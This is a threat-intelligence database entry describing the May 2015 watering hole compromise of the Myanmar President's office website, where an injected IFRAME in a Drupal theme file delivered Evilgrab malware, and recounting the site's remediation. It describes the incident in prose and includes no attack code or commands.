Cyber Incident Victim: Ministry of Information
Date:
May 2015
Location:
Myanmar
Summary
A watering hole attack compromised the President of Myanmar's official website via malicious code injected into a Drupal theme JavaScript file, delivering the Evilgrab malware (also known as Vidgrab) to visitors. Threat actors targeted individuals and organizations associated with the country's political or business activities, maintaining unauthorized access to the site for an extended period before its operators took it offline following discovery. The victim organization subsequently migrated content to a new domain lacking the exploit infrastructure, indicating remediation efforts. The incident demonstrated strategic website compromise tactics aimed at intelligence gathering from high-value visitors.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 2 motives | 2 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
On May 12, 2015, Unit 42 identified a watering hole attack targeting the official website of the President of Myanmar, hosted at "www.president-office.gov[.]mm." The compromise involved injecting an inline frame (IFRAME) into a JavaScript file utilized by the Drupal content management system for the site's theme. This malicious modification triggered automatically when visitors accessed the main page, redirecting them to exploit content. Evidence indicated threat actors maintained unauthorized access to the website since at least November 2014, suggesting prolonged surveillance or staging prior to the observed exploitation. The attackers selected this high-profile government platform to harvest information from individuals in Myanmar, those engaged in political relations with the country, and organizations conducting business there. The delivered payload, identified as Evilgrab malware (also known as Vidgrab), facilitated data theft from compromised systems. This malware exhibited capabilities for capturing screenshots, logging keystrokes, and exfiltrating documents, though specific victim data or operational impacts were not quantified in available reporting.
Following Unit 42's notification to website operators, administrators took the compromised site offline. A replacement website with identical legitimate content was subsequently established at "www.myanmarpresidentoffice.info," which retained structural and thematic elements from the original domain but contained no traces of the exploit code. The migration to this new domain formed part of the remediation strategy to restore official communications while severing attacker access. Infrastructure analysis revealed the watering hole redirected victims through multiple intermediary domains before delivering the final Evilgrab payload, though the precise number of compromised systems or identity of victims remained unconfirmed. The incident demonstrated deliberate targeting of Myanmar's digital government assets for espionage purposes, leveraging a trusted public resource to infiltrate specific visitor populations. No additional details regarding post-incident forensic investigations, attribution to specific threat groups, or broader geopolitical consequences were disclosed in the analyzed source material.